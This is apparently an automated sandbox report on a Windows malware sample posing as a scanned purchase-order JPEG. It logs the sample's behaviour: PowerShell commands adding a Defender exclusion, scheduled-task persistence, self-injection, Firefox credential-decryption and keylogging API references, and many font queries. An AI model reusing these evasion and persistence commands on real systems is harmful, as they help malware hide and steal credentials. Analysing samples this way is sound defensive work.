                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, COVID19.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Memory written: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Process created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp"
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Process created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
